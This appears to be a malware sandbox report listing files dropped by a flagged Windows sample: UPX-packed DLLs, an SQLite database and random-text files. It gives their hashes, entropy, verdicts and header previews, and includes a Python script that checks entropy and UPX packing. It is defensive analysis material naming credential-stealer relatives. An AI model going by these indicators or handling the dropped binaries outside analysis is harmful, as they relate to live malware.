                                                                                                                                                                                                                                  Preview:SQSJKEBWDTQPYRJUMTXHILYOMMANPJPHHMRHFVWTZEPXAIAVKTSBZRYUTWHNFQIECJFXGKPUTVPJATJGMKUHXJODTESNRMMJTXWENSGOWPBKXVHEEJMAGWUGYELOFGDDMEXBMBPCQOZDIQJHWWTSSVNGZLVHCHBZNJSYUOTWAPZJKFXWFCXQUQCBQYKVYKKKLNXSSSSLGTAFUMEJNHNRUGIMMETQDZKJCJZPRVXTSJLLHAUIPPNLEBPEUBCKHAPQUFAGPBYQCGICNBXZSXWAJNTKCUOBGQDHMCHIJBTKFTHSCPEBQXTOJKUAWTWRXEPYUIVUBKOGJQVRNBCCKFIMUIRPTIPNOIKNYUBFQMLTBCEFKXWKFTLKOEFALEANNDBOMFEYCLJVLOGSDFYCVBHQLAHJAEUYVZUKKYJAFJZPGGRXWJYMLQJGLJJPLVWQZTEJZVFZAIXBTWSNPXWYEWJSPNEXNORNZGESIRMDWDAAOUYCCNJQHBKTFVBSDSYVEQCQSBURVVYQIWJIGTJQDEZYGUHFKDWPAZGTXJFCGXCCHSPAITPOYIKUIZLMXTHWETVEIEWMJFHZRXBWPEKERORJFPHCCESXPZRWMEWGFCALFMDGOIEYAUSWWMBCHUQFBDJAZGNOFCHHPWSPGMHXGUSYBEKNZGGOHLEYLHJOUACYWSDKSJOOWHEPLCCKEWYVGVDSYJISOXMVCTJOSETWHUFBVDRYYAHSNIHPIRACNMMCDXLNSSFMVYGREIDELWCRHNKSOHQZMWMXEQMSXGXGWJQEDVLZMOLCVOBDXALQOHTEQUQCXKBTZHLAPBTYYAAPCTPIOGNQTMUINQRWRUZPUNQRXBMEDXPKAFCNTHZHZNOSMHOZZDSRACZMUSFUZGUJWIHKQKPTYZQWGZAUVTCZBLLEBGRXXRHNYNRCEMXSYIJTSCGAJZWVATKNNHCIBGACCGABGJJVWJDJTYOTKQWITZPWLFTBKVEPEVHMSUDPVSVB
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1026
                                                                                                                                                                                                                                  Entropy (8bit):4.702263764575455
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                                                                                                                                                                                  MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                                                                                                                                                                                  SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                                                                                                                                                                                  SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                                                                                                                                                                                  SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):196608
                                                                                                                                                                                                                                  Entropy (8bit):1.1239949490932863
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
                                                                                                                                                                                                                                  MD5:271D5F995996735B01672CF227C81C17
                                                                                                                                                                                                                                  SHA1:7AEAACD66A59314D1CBF4016038D3A0A956BAF33
                                                                                                                                                                                                                                  SHA-256:9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
                                                                                                                                                                                                                                  SHA-512:62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Preview:SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):97168
                                                                                                                                                                                                                                  Entropy (8bit):6.424686954579329
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:yKHLG4SsAzAvadZw+1Hcx8uIYNUzU6Ha4aecbK/zJZ0/b:yKrfZ+jPYNz6Ha4aecbK/FZK
                                                                                                                                                                                                                                  MD5:A87575E7CF8967E481241F13940EE4F7
                                                                                                                                                                                                                                  SHA1:879098B8A353A39E16C79E6479195D43CE98629E
                                                                                                                                                                                                                                  SHA-256:DED5ADAA94341E6C62AEA03845762591666381DCA30EB7C17261DD154121B83E
                                                                                                                                                                                                                                  SHA-512:E112F267AE4C9A592D0DD2A19B50187EB13E25F23DED74C2E6CCDE458BCDAEE99F4E3E0A00BAF0E3362167AE7B7FE4F96ECBCD265CC584C1C3A4D1AC316E92F0
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Joe Sandbox View:
                                                                                                                                                                                                                                  • Filename: file.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SolaraV4.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.not-a-virus.HEUR.RemoteAdmin.Win64.Remsim.gen.13211.29605.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.not-a-virus.HEUR.RemoteAdmin.Win64.Remsim.gen.13211.29605.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.BScope.Trojan.Wacatac.4653.13746.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.BScope.Trojan.Wacatac.4653.13746.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: LisectAVT_2403002A_216.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: , Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: LaZagne.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  • Filename: SecuriteInfo.com.Trojan.Python.Psw.25309.14489.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..qn.."n.."n.."...#l.."g.."e.."n.."B.."<..#c.."<..#~.."<..#q.."<..#o.."<.g"o.."<..#o.."Richn.."................PE..d...Y.-a.........." .........`......p.....................................................`A.........................................B..4....J...............p..X....X...#..........h,..T............................,..8............................................text............................... ..`.rdata...@.......B..................@..@.data...@....`.......@..............@....pdata..X....p.......D..............@..@_RDATA...............P..............@..@.rsrc................R..............@..@.reloc...............V..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32720
                                                                                                                                                                                                                                  Entropy (8bit):7.649325629705361
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:lu5xpQhqPRm9KjENjt3vh8rXWep0YIp5nYnYiSyvjOhP:05Mqw9mERJioYIp5nYn7Sy+
                                                                                                                                                                                                                                  MD5:14709A8F2CC2E00FAC56FF0437F72BC2
                                                                                                                                                                                                                                  SHA1:08CC3F10280FDAA31D2A02C9176FBD6B730A446C
                                                                                                                                                                                                                                  SHA-256:A4F7A2296C0989452D542789637C4DD66CFFC7995FCEF0E924804588DAA74251
                                                                                                                                                                                                                                  SHA-512:DB7E00725AC035E0DB9C9C625429D032E4260285237E22914AD71D29D4A6437390649B0A034AE20E8E9D69B35C58C928D06D45653A77E99967DC86215E4401B8
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........B...B...B...K...@......@......I......J......A......A.....@...B.........C......C.....p.C......C...RichB...........................PE..d.....1b.........." .....P...........".......................................@............`..........................................:..P....9..P....0......................D;..........................................8...........................................UPX0....................................UPX1.....P.......P..................@....rsrc........0.......T..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):45008
                                                                                                                                                                                                                                  Entropy (8bit):7.783456764865138
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:A3CnjEFEHH57WfWzAPpIe7zOsupVPW9zxtrXhcwKnXLjFSBrCpA3IptVVeYYiSy9:A6jEFO7WffITsMw9vrxcpnlSBrR3Ipt7
                                                                                                                                                                                                                                  MD5:2D1C4D692CD8184038222AAD2F54751B
                                                                                                                                                                                                                                  SHA1:F36153CC210FF9E33C0D9CFBB9905D9C6772C43B
                                                                                                                                                                                                                                  SHA-256:FD3DDC5129A4D8B4C27AA60B42ADA66BA505ABC8CF9639CF95E1525CF4732B98
                                                                                                                                                                                                                                  SHA-512:BC0463A4832858BAC6EE54328AFD534191531A307E7FE390A35B48E36517C148DBC41C5FC44DC639F49CBBB59B9CEEB9D9D53BCC9C19454D99869EE648668C1B
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......+..>o.mo.mo.mf.=me.m=..lm.m..Sml.m=..lc.m=..lg.m=..lk.m..ll.m...lm.mo.m0.m..lg.m..ln.m.Qmn.m..ln.mRicho.m................PE..d.....1b.........." .................b....................................................`..........................................{..H....y.......p....... ..,............{.......................................n..8...........................................UPX0....................................UPX1................................@....rsrc........p......................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):72704
                                                                                                                                                                                                                                  Entropy (8bit):7.915281953043909
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:g+638lwdrNzfq3MgGu9KgGWzt1iaqP+E4WnpH118g:gz8u/zf4MgGuZGWzt1ia7E4WpH11
                                                                                                                                                                                                                                  MD5:7727212E7BDBF63B1A39FB7FAAD24265
                                                                                                                                                                                                                                  SHA1:A8FDEC19D6690081B2BF55247E8E17657A68AC97
                                                                                                                                                                                                                                  SHA-256:B0116303E1E903D6EB02A69D05879F38AF1640813F4B110CB733FFFF6E4E985C
                                                                                                                                                                                                                                  SHA-512:2B1A27642118DD228791D0D8BA307AA39AB2D9C7D3799CFF9F3C0744FE270EEAEFE5545A4FDA6E74E86FEE747E45BF5F6C9AC799950C2B483A16EB3CE85D816A
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........#...p...p...p...p...p.y.q...p.y{p...p.y.q...p.y.q...p.y.q...p.q...pi..q...p...pX..p.x.q...p...p...p.x.q...p.xyp...p.x.q...pRich...p................PE..d......f.........." ...). .......0..@C...@...................................p............`..........................................c..l....`.......`......................hd..$...................................@O..@...........................................UPX0.....0..............................UPX1..... ...@......................@....rsrc........`......................@......................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):55760
                                                                                                                                                                                                                                  Entropy (8bit):7.819238906178287
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:94eSBuhlC82gmmCm7jDCxSI+n6LzPIpQP1Q7SyWA:6PAH4gZT7qxSIYo7IpQP1QUA
                                                                                                                                                                                                                                  MD5:EF1217909E473E7550D4E0F8649E9899
                                                                                                                                                                                                                                  SHA1:52489AC45202525C3757741015376806DA73131A
                                                                                                                                                                                                                                  SHA-256:6C5F213CEE7F1EDE6F5EC7FFC7102B2E777E9A19EB21E795BCD0BA6DE1F49489
                                                                                                                                                                                                                                  SHA-512:E62AE850E3BE398BF2D91269A5958C2C6AEDE111E58876675A04A343A927D1DF306CEF559A34B19D9F88EDBC4EE7CDACA31D6B0C72EB388C93BE6BD017058D28
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S..2c..2c..2c..J...2c..Gb..2c..Gf..2c..Gg..2c..G`..2c..Gb..2c.y@g..2c.y@b..2c.0[b..2c..2b.B2c..Gn..2c..Gc..2c..G...2c..Ga..2c.Rich.2c.........PE..d.....1b.........." .............p...........................................@............`.........................................H<.......9.......0.......................<.......................................&..8...........................................UPX0.....p..............................UPX1................................@....rsrc........0......................@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):104400
                                                                                                                                                                                                                                  Entropy (8bit):7.937647792938965
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:dDhNkBvoXMKbJcJR7/V321Rh59If1Yv9dIAlfRP1L/I6TI21wUqOScfRVWIp5qTA:VhNioXPGhQ1RhMWVmonuqq5dIp5qTJe1
                                                                                                                                                                                                                                  MD5:43962D46DCE863E51863783FB186A449
                                                                                                                                                                                                                                  SHA1:6F62AF15B738D38AC333D477F840284627EC8849
                                                                                                                                                                                                                                  SHA-256:BBE1500C272C8452C63520326683FCD48AA184C0A4F41ED56AC08278EF5DD3DA
                                                                                                                                                                                                                                  SHA-512:7D7591FCE56EEAC924C6BFF06118A0F0DA951133EC8192696832E03E4CDEB22242D8D5A103C330E47C358743B75929A82CC833D3BE51F53540D7C970CCB594F0
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......$.:.`.T.`.T.`.T.i..n.T.2.U.b.T.2.Q.l.T.2.P.h.T.2.W.d.T..U.c.T...U.b.T.`.U...T..W.a.T..Y.o.T..T.a.T....a.T..V.a.T.Rich`.T.........PE..d.....1b.........." .....p...................................................0............`..........................................,..P....)....... ...........'...........-..........................................8...........................................UPX0....................................UPX1.....p.......f..................@....rsrc........ .......j..............@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):32208
                                                                                                                                                                                                                                  Entropy (8bit):7.622398588472328
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:Tuzj/mymouMvtUzC0ApFBsGeT0pSOIp5IYIYiSyvxhq:TuOyCFQFBsGeZOIp5IYI7Sy+
                                                                                                                                                                                                                                  MD5:4ACA251F62EB58043EBDDB2F7E6723F0
                                                                                                                                                                                                                                  SHA1:3F5CFD347F16C9CFF5BC95B26D3081031A71AD85
                                                                                                                                                                                                                                  SHA-256:04CC829AF7271A9B50CD03D59860E0E12F146D0DD2E16D51CD3E6F8B7F6AF45E
                                                                                                                                                                                                                                  SHA-512:0E1E97FBD6FAC6B2AA0655D08C5DB888E3EC5E34ABF33CE8741AB875B424EDE4619387CE612B71FF273F0977DAA535D1B33E3856B124A11CC3999E8715B139F7
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........SQ..2?.2?.2?.J..2?..G>.2?..G:.2?..G;.2?..G<.2?..G>.2?.i@>.2?.:K>.2?.2>.<2?..G2.2?..G?.2?..G..2?..G=.2?.Rich.2?.................PE..d.....1b.........." .....P.........../.......................................P............`..........................................K..P....I.......@.......................K.......................................;..8...........................................UPX0....................................UPX1.....P.......N..................@....rsrc........@.......R..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):83920
                                                                                                                                                                                                                                  Entropy (8bit):7.911791662954149
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:OF1fiAetZPDQ86DmlWNVN3fvfAunuQCq4i2f7NpWP7U88i/Ipe1es7SyCIm:q6AetZkPm0LNox1lfq4SIpe1es0Im
                                                                                                                                                                                                                                  MD5:672C40C864AB29141A573F778D57D1A2
                                                                                                                                                                                                                                  SHA1:BC9443654F593163D02CCDB790C17AE8BCEA9C04
                                                                                                                                                                                                                                  SHA-256:8CF7D39BE3F91971B1F8FC88A0E320EDB720E0E61D26A32B56BBEBE3FE23E485
                                                                                                                                                                                                                                  SHA-512:FB60DE107C049D9B4DCFAE5B13E56CBF080E736FA69C92291B7F4ABF838EEE2A62D940B0B2B69CC60A650BDD127FFF8BF305CDB220592C5A0132953546B14084
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......N.l....................X.......X.......X.......X..........................o......0........................Rich....................PE..d.....1b.........." ..... ..........p.....................................................`.........................................4...L....................@......................................................p...8...........................................UPX0....................................UPX1..... ..........................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):23504
                                                                                                                                                                                                                                  Entropy (8bit):7.417904254536333
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:384:JLzYgoPh6tbnAPiAv6N6M0G6RF7Za7gJXwL0qIpRBLYveLBIYiSy1pCQf2HZhql:JXBoPwkTG6RxpAL0qIpRtYrYiSyvO5hM
                                                                                                                                                                                                                                  MD5:D6D33072072F7F9FE1AD69846D2D99CB
                                                                                                                                                                                                                                  SHA1:72089A7B0C42798A3C997054D99BF63A36361589
                                                                                                                                                                                                                                  SHA-256:803AD62CBC5834B59DC3CCD44E8B71B5A6DEDCDD8FCD8BD13B3CFEAB765721B7
                                                                                                                                                                                                                                  SHA-512:0C82744221A3E392C736C2B3D97E1577316279DDDB587F71457CFE101BE205CB52E871A28FDC8A485C0A2474A4515E5479FFD3638E590FA18142C3248112A670
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........s... ... ... .d ... ...!... ...!... ...!... ...!... Y..!... ... ... 7..!... Y..!... Y..!... Y.. ... Y..!... Rich... ........................PE..d.....1b.........." .....0..........p.....................................................`.........................................4...`....................`..........................................................8...........................................UPX0....................................UPX1.....0.......,..................@....rsrc................0..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
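Every dropped file in the entries above is a PE32+ DLL whose Preview shows the section names UPX0, UPX1 and .rsrc followed by the "4.20.UPX!" packer marker, with 8-bit entropy between 7.4 and 7.94, and none of them has a ReversingLabs hit. The following is an added example, not code from Joe Sandbox or from the sample, that reproduces the two checks a triager would run on such a file locally: the 8-bit Shannon entropy the report lists as "Entropy (8bit)", and a walk of the PE section table for UPX section names plus the "UPX!" magic. High entropy on its own does not prove packing (compressed or encrypted resources score just as high), which is why the section-name check is paired with it. The helper names (shannon_entropy, pe_section_names, upx_indicators, build_sample_pe) and the two sample images are constructed for this example; the images are minimal, non-runnable PE layouts, not the dropped files themselves.

```python
import math
import random
import struct
from typing import Dict, List

# Helper names below are this example's own (hypothetical), not a Joe Sandbox API.


def shannon_entropy(data: bytes) -> float:
    """8-bit Shannon entropy in bits per byte, the quantity the report lists as
    'Entropy (8bit)'. 8.0 is uniformly random; plain code and text sit well below 7."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def pe_section_names(data: bytes) -> List[str]:
    """Walk DOS header -> e_lfanew -> 'PE\\0\\0' -> COFF header -> section table
    and return the 8-byte section names. Raises ValueError on malformed input."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature not found at e_lfanew")
    # COFF file header: Machine, NumberOfSections, TimeDateStamp,
    # PointerToSymbolTable, NumberOfSymbols, SizeOfOptionalHeader, Characteristics
    _, num_sections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    table = e_lfanew + 4 + 20 + opt_size
    names = []
    for i in range(num_sections):
        raw = data[table + i * 40: table + i * 40 + 8]   # IMAGE_SECTION_HEADER is 40 bytes
        if len(raw) < 8:
            raise ValueError("truncated section table")
        names.append(raw.rstrip(b"\0").decode("ascii", "replace"))
    return names


def upx_indicators(data: bytes) -> Dict[str, object]:
    """Combine the three signals visible in the report's Preview lines:
    UPX0/UPX1 section names, the 'UPX!' packer magic, and high entropy."""
    names = pe_section_names(data)
    ent = shannon_entropy(data)
    return {
        "sections": names,
        "upx_sections": any(n.startswith("UPX") for n in names),
        "upx_magic": b"UPX!" in data,
        "entropy": round(ent, 3),
        "high_entropy": ent > 7.0,   # triage heuristic, not proof of packing on its own
    }


def build_sample_pe(section_names: List[str], body: bytes, trailer: bytes = b"") -> bytes:
    """Constructed, non-runnable PE32+ image for the demo (not a real dropped file).
    Only the fields pe_section_names() reads are populated."""
    e_lfanew = 0x40
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    opt_size = 0xF0                                   # size of a PE32+ optional header
    coff = struct.pack("<HHIIIHH", 0x8664, len(section_names), 0, 0, 0, opt_size, 0x2022)
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)   # PE32+ magic, rest zeroed
    table = b"".join(n.encode("ascii").ljust(8, b"\0") + b"\0" * 32 for n in section_names)
    return dos + b"PE\0\0" + coff + opt + table + body + trailer


# Constructed samples: a UPX-style layout with a pseudo-random (compressed-looking)
# body and the packer marker, and a plain layout with repetitive low-entropy content.
_rng = random.Random(20241027)
PACKED = build_sample_pe(["UPX0", "UPX1", ".rsrc"],
                         bytes(_rng.randrange(256) for _ in range(4096)),
                         trailer=b"4.20\0UPX!")
UNPACKED = build_sample_pe([".text", ".rdata", ".data"],
                           (b"\x48\x8b\xc4" + b"\0" * 13) * 256)

if __name__ == "__main__":
    for label, img in (("packed", PACKED), ("unpacked", UNPACKED)):
        print(label, upx_indicators(img))
```

To compare against the report, run upx_indicators() over the actual dropped file after confirming its SHA-256 matches the entry; the entropy value should agree with the "Entropy (8bit)" field to within rounding. If the section names and magic are present, `upx -d` will usually restore the original DLL, but a modified stub or a post-packing patch can make the standard unpacker refuse the file, so a failed `upx -d` is itself worth noting in the triage record.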
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):28624
                                                                                                                                                                                                                                  Entropy (8bit):7.551279532200784
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:u9BCKSQ1GFNbJ1jPrpPcEIpstYZYiSyvmhv:CBCKvU3bJ9tcEIpstYZ7Sy+
                                                                                                                                                                                                                                  MD5:28EA417BF25B472C909CF63462BA9EF4
                                                                                                                                                                                                                                  SHA1:C3754CB23BBEC72151BA79F7FCD9B6B9A63B2694
                                                                                                                                                                                                                                  SHA-256:8CB8F65F1CC6717E85DA97BEF42EF61AA644A5C5BCFC6C23FED893D24B9ADE06
                                                                                                                                                                                                                                  SHA-512:ABB995F6F0E72FACE46619C282A555B0175E3B05C750C9637B0F4FBA3F2F2DFA9F7ED5E53443A7547DAE34BA67989D80F29A8200FA1116291C949A6BE7CD06FC
                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........J...$...$...$.......$..%...$..!...$.. ...$..'...$.).%...$...%...$.G.%...$.G. ...$.).)...$.).$...$.).....$.).&...$.Rich..$.................PE..d.....1b.........." .....@................................................................`.........................................x...X...............................................................................8...........................................UPX0....................................UPX1.....@.......@..................@....rsrc................D..............@..............................................................................................................................................................................................................................................................................................................................................4.20.UPX!.$..
                                                                                                                                                                                                                                  Process:C:\Users\user\Desktop\SecuriteInfo.com.FileRepMalware.22561.28030.exe
